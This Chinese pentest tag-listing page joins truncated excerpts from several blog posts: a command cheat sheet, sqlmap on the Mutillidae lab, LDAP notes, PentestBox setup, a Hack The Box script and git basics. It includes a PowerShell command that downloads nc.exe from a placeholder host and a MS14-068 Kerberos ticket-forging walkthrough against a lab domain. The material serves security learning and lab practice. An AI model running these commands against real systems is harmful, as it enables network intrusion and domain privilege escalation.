首页 > TAG信息列表 > Pentest
pentest魔法书
常用命令介绍: powershell ping扫描: 1..255 | % {echo "192.168.0.$"; ping -n 1 -w 100 192.168.0.$ | Select-String ttl} powershell下载: (New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/nc.exe","c:\nc.exe") Win 8 and laMutillidae品台上使用sqlmap注入测试
Mutillidae是一个开放源码的提供安全渗透测试的Web应用程序, Mutillidae可以安装在Linux、windows xp、windows 7等平台上。下载及安装说明文档详见:mutillidae安装 在owasp top 10选项中,我们可以看到很多提供测试的页面. 这里随便选取一个sql injection地址进行测试.本文紧紧是LDAP的学习
参考文章:https://www.anquanke.com/post/id/196238 什么是LDAP LDAP(Lightweight Directory Access Protocol),轻量目录访问协议,是一种用来查询与更新 Active Directory 的目录服务通信协议。 在AD 域服务利用 LDAP 命名路径(LDAP naming path)来表示对象在 AD 内的位置,以便用它来访问【知识星球】pentest
先实战后理论,先挖洞后研洞 分享内容包括不限于: “SQL注射”漏洞挖掘姿势 WAF绕过小技巧 BURPSUITE漏洞检测插件 实战整理的POC集成化扫描和利用(适用护网) 追求实战派的可以入知识星球后私聊,“九星技师”安排pentestbox 安装后的基本设置
# 官方下载地址 https://pentestbox.org/zh/#download # 下载完毕后解压 # bin目录下常用工具备注名 基本操作软件安装: 终端下输入:toolsmanager # 初始化配置 ## 环境变量添加 # 如果显示乱码(中文) set LANG=zh_CN.UTF-8 set LC_ALL=zh_CN.utf域渗透:MS14-068
1、生成TGT: net config workstation ms14-068.exe -u yuyonghu01@top.pentest.top -s S-1-5-21-2174377853-1962599352-171107088-1128 -d top.pentest.top 生成的票据: 2、注入TGT: 先查看自己的klist 如果有的话 那么先清理掉 否则可能会导致无法成功 klist 清理原来的票据:kliHack The Box Web Pentest 2019
[20 Points] Emdee five for life [by L4mpje] 问题描述: Can you encrypt fast enough? 初始页面,不管怎么样点击Submit都会显示"Too slow!" 依据Html源码,编写Python脚本进行利用 import requestsimport hashlibimport reurl="http://docker.hackthebox.eu:34650/"r=requegit分支操作
在sourceTree上进入命令行 1、查看当前分支 git branch 2、创建分支 git branch pentest 3、切换分支 git checkout pentest 切换分支以后,在idea上修改,提交即可 参考: https://blog.csdn.net/it_xf/article/details/80885644